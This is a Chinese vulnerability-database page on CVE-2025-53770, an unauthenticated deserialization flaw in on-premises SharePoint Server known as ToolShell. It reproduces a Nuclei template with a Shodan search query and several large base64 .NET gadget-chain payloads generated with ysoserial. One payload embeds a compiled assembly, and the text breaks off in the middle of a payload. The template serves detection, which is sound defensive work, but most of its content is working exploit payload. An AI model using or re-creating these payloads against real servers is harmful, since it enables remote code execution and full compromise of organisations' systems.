Microsoft SharePoint Server Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Microsoft SharePoint Server Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-53770

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Microsoft SharePoint Server是一款广泛使用的企业级协作平台,支持文档管理、团队协作和业务流程自动化等功能。该漏洞存在于SharePoint Server的on-premises版本中,涉及对不可信数据的反序列化处理。攻击者可以通过网络利用此漏洞,无需身份验证即可执行远程代码,导致系统完全被控制。漏洞的技术根源在于SharePoint Server在处理特定数据时未能正确验证输入,从而允许攻击者构造恶意数据触发反序列化过程,执行任意代码。此漏洞已被发现在野外被利用,Microsoft已确认存在针对该漏洞的利用代码。攻击者可以利用此漏洞进行远程代码执行,可能导致数据泄露、服务中断等严重后果。由于攻击无需身份验证且可以自动化执行,因此该漏洞的安全风险极高。

产品厂商: Microsoft

产品名称: SharePoint Server

搜索语法: http.component:”sharepoint”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/1b58b8e5683444c0b2b70fb29084c2a5bbfefdca/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138

id: CVE-2025-53770

info:
  name: Microsoft SharePoint Server - Remote Code Execution (ToolShell)
  author: _l0gg,SamIntruder,sfewer-r7,iamnoooob,pdresearch
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
  remediation: |
    Apply the latest security patches from Microsoft or implement the temporary mitigations provided in the CVE documentation until a comprehensive update is available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://x.com/codewhitesec/status/1944743478350557232
    - https://github.com/rapid7/metasploit-framework/pull/20409
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-53770
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"sharepoint"
  tags: cve,cve2025,kev,sharepoint,rce,microsoft,toolshell

variables:
  dataset_gadget_b64: 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L'
  # ./ysoserial.exe -f LosFormatter -g XamlAssemblyLoadFromFile -c "Exploit.cs;System.dll;System.Web.dll"
  # HttpContext.Current.Response.Headers["X-Nuclei"] = "CVE-2025-53770";
  internal_gadget_b64: '/wEy1jAAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAAAYHAAAAqiA8UmVzb3VyY2VEaWN0aW9uYXJ5CnhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iCnhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIgp4bWxuczpzPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiIKeG1sbnM6cj0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uUmVmbGVjdGlvbjthc3NlbWJseT1tc2NvcmxpYiIKeG1sbnM6aT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uSU87YXNzZW1ibHk9bXNjb3JsaWIiCnhtbG5zOmM9ImNsci1uYW1lc3BhY2U6U3lzdGVtLklPLkNvbXByZXNzaW9uO2Fzc2VtYmx5PVN5c3RlbSIKPgogICA8czpBcnJheSB4OktleT0iZGF0YSIgeDpGYWN0b3J5TWV0aG9kPSJzOkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyI+CiAgICAgIDx4OkFyZ3VtZW50cz4KICAgICAgICAgPHM6U3RyaW5nPkg0c0lBQUFBQUFBRUFPMVd5MDljVlJqLzNXRm9oNkVRS0xXV3BOYUxVRU45M0F4bDhORVlTeG13WUhqSndORFlKbkJuNWdqWDNMbDNldThkaEM2MExqUTFNV3FpY2VmS1RSZGROS2JHeHNURWhWdVdibHp4QjVqb1ZoZmk3NXg3NXdGTVVqYW1pZUc3Yzc1enpuZSt4Kzg3ejVsNSt3dTBBSWl6N080Q0R4SFNLQjVOdDFrNm4vNnhFdy9hdHZzZWF0UGJmWXZybHErWFBYZk5NMHQ2d1hRY045RHpRdmNxam00NSt2aGNWaSs1UldGMGRDUUhJaC96RThDMDFvTHlxUS9YcTM1M0VPdHIxOXFCWXdnTDZadzAwR3ZBdWxRN0Z1SUc2clVDRlF1YkxSajlTS3JLWDcydVZZcCs2UWVXbzRUdnhwb2t1UXFjT01SY0hDRGlTelIwRSt4UE52U05RR3dHckFmaW9hN0tjMTk4aWxjTnovY0tpTEFSbzBvMHNWZVA0bEhERTdaYmlMQ3VScjVPSE5BYk80QXpXb2hKWmRLS1RRYWQ1b2JRRHBGaU0vbzZOa2pyNUNCaEp0MVd5WmhZMHFPN3N0ZEQ1aDVuOXprQ3liNDVwa1ZSSk15TnRKRXlobFBEUTY5S1NTdHM4ck1jN244ZnVNTjZRTGF6Z1djNWE3N1V1TWY4MHF6N2w3TFlpWVZyMm45MWFXcWM5Wi9zMzVEOU1kdk5SN2dvMHE2ZUF0cGs1Ky96d3pnZDVsaWRkdGsrM3RCdVVWYkpDT0V4WE1BejVEbThSTDVCbnNSZGZFUCtNM2tuL3NKdlNrK0x1UHk2OEtUS1JMYm5kU24vK0V4S2VleEdpamE5a0wwMnhmdndBR2ZKdDFrdW9FTjdGa1BvMVo2SGdYYTJEUFRnRXVLMzk4LzFWMmpZOXlwdXI2b2JaVDNFdDErbU1aY2F2VGJqRml1MmVCMmwwbEJ4Sk8zZk5JcTJqUW1VL0lMcjJWWWUyUzAvRUNYTTVkOFZoUUJHSVhDOVNHWXNWSnpBS2drajQ1YktsaTI4clBBMnJJTHdFUXJNd0hLZEJXR2JtNnJsWHdtNGZ2bEtJQkFaU2pVTzVTM2JDcmJxbzFVazFURExJby9KSUNoblhFZWRtalVSckdRcW5pZWNRTWtYaEYrbWU2RUdhcDNJT09QYU5vSEwrRWEyTEFxV2FWdTNSQkd6Wmtua1RMc2k2Z3JLZmxLWVJlSDU4Tm1la29tVHVxL2hSY3lpZ2dMM3BZQUY3YWtNOThJRXBSZTVmaGN4d3RZSWh2RXl2NVRhQmQ5K3Y1UzYzdmZaNUtmZk9kZG52dno4TFNSK3VIVWoxNXZlK2FSRmh4YlhOUzJSdUg5NTVZUHVYNU9YdURZbnUrTTZUajRoV1crckh0TTZPeE5hZE16UHlRMjBHRHU5N0pubFdkZVoyQ3lJc2tTN3VPNjU3L2t5MXUvOTllWHNyTjZUeldpZ21YQWw0M3JqdGoxaldrNjQ2RUtvTFNCcDl6eDlkVFd6T3FML0kybHFzYytFcitnZXVkeG5xU1p5U2ZMdHVEYktkNlBoL1pxT3lkczVoeXhXMUVsWllHc0tjenhGSzZ4bjhRYmJrbjZLLy9GUHM5Zm1jbFRMZTJ2L3N6eXVJdWRnd3FNZlM1M0pLVGg0QjY0YUgxQldpeHcxS2ZVNWJpS2duc3RlU1Bmajl6VHBJMHU1eHhFZS9TYWU3aWlkVk8xTEl5L25BQzhRa1ZiVEgyZnhlVE5JUCtVOWNYUTFaNGtHM1J5TFIrMjZUb3EzZTczd09rWUg5U1dHUU9rNnhHNXp2a3lVMkFkNWlTOUNrYmRObW41dTBxckk4ZkMwRGlwYzA5UmJVMVlaUmlsalN5RmJ3enFDQ05PNGlqRVh5YTBvUmhXamM2aFlhWlhYUEgyNGxNcWJNVGlRM2Y3Y1hsRTJWNmpoVTdQRTJiU0pUbitrM1JIOWg2U0gvNy8wOU9NR2NrU1BnLzRGQmVCNm53QU9BQUE9PC9zOlN0cmluZz4KICAgICAgPC94OkFyZ3VtZW50cz4KICAgPC9zOkFycmF5PgogICA8aTpNZW1vcnlTdHJlYW0geDpLZXk9ImlucHV0U3RyZWFtIj4KICAgICAgPHg6QXJndW1lbnRzPgogICAgICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImRhdGEiPjwvU3RhdGljUmVzb3VyY2U+CiAgICAgIDwveDpBcmd1bWVudHM+CiAgIDwvaTpNZW1vcnlTdHJlYW0+CiAgIDxjOkdaaXBTdHJlYW0geDpLZXk9Imd6aXBTdHJlYW0iPgogICAgICA8eDpBcmd1bWVudHM+CiAgICAgICAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iaW5wdXRTdHJlYW0iPjwvU3RhdGljUmVzb3VyY2U+CiAgICAgICAgICAgIDxjOkNvbXByZXNzaW9uTW9kZT4wPC9jOkNvbXByZXNzaW9uTW9kZT4KICAgICAgPC94OkFyZ3VtZW50cz4KICAgPC9jOkdaaXBTdHJlYW0+CiAgIDxzOkFycmF5IHg6S2V5PSJidWYiIHg6RmFjdG9yeU1ldGhvZD0iczpBcnJheS5DcmVhdGVJbnN0YW5jZSI+CiAgICAgIDx4OkFyZ3VtZW50cz4KICAgICAgICAgPHg6VHlwZSBUeXBlTmFtZT0iczpCeXRlIi8+CiAgICAgICAgIDx4OkludDMyPjM1ODQ8L3g6SW50MzI+CiAgICAgIDwveDpBcmd1bWVudHM+CiAgIDwvczpBcnJheT4KICAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0idG1wIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGd6aXBTdHJlYW19IiBNZXRob2ROYW1lPSJSZWFkIj4KICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImJ1ZiI+PC9TdGF0aWNSZXNvdXJjZT4KICAgICAgICAgPHg6SW50MzI+MDwveDpJbnQzMj4KICAgICAgICAgPHg6SW50MzI+MzU4NDwveDpJbnQzMj4KICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgPC9PYmplY3REYXRhUHJvdmlkZXI+CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJhc21Mb2FkIiBPYmplY3RUeXBlPSJ7eDpUeXBlIHI6QXNzZW1ibHl9IiBNZXRob2ROYW1lPSJMb2FkIj4KICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+CiAgICAgICAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iYnVmIj48L1N0YXRpY1Jlc291cmNlPgogICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+CiAgICA8L09iamVjdERhdGFQcm92aWRlcj4KICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9InR5cGVzIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGFzbUxvYWR9IiBNZXRob2ROYW1lPSJHZXRUeXBlcyI+CiAgICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzLz4KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPgogICAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZmlyc3RUeXBlIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIHR5cGVzfSIgTWV0aG9kTmFtZT0iR2V0VmFsdWUiPgogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgICAgICAgICAgPHM6SW50MzI+MDwvczpJbnQzMj4KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgPC9PYmplY3REYXRhUHJvdmlkZXI+CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJjcmVhdGVJbnN0YW5jZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBmaXJzdFR5cGV9IiBNZXRob2ROYW1lPSJJbnZva2VNZW1iZXIiPgogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgICAgICAgICAgPHg6TnVsbC8+CiAgICAgICAgICAgIDxyOkJpbmRpbmdGbGFncz41MTI8L3I6QmluZGluZ0ZsYWdzPgogICAgICAgICAgICA8eDpOdWxsLz4KICAgICAgICAgICAgPHg6TnVsbC8+CiAgICAgICAgICAgIDx4Ok51bGwvPgogICAgICAgICAgICA8eDpOdWxsLz4KICAgICAgICAgICAgPHg6TnVsbC8+CiAgICAgICAgICAgIDx4Ok51bGwvPgogICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+CiAgICA8L09iamVjdERhdGFQcm92aWRlcj4KPC9SZXNvdXJjZURpY3Rpb25hcnk+BAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAADIAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAAWFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUGDgAAACBTeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcgYPAAAABVBhcnNlCRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAACJTeXN0ZW0uT2JqZWN0IFBhcnNlKFN5c3RlbS5TdHJpbmcpBhUAAAAiU3lzdGVtLk9iamVjdCBQYXJzZShTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
  # ./ysoserial.exe -f LosFormatter -g ActivitySurrogateSelectorFromFile -c "E.cs;System.dll;System.Web.dll;System.Configuration.dll"  --minify
  # HttpContext.Current.Response.Headers["X-Nuclei"] = "CVE-2025-53770";
  internal_gadget2_b64: '/wEykEgAAQAAAP////8BAAAAAAAAAAQBAAAAO1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCxtc2NvcmxpYl1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABeU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAADgAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwDREYJoAAAAAAAAAADgAAIhCwELAAAGAAAABgAAAAAAAB4kAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAADEIwAAVwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACQEAAAAIAAAAAYAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACAAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAAwAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAACQAAAAAAABIAAAAAgAFAHggAABMAwAAAQAAAAAAAAAAAAAAAAAAAA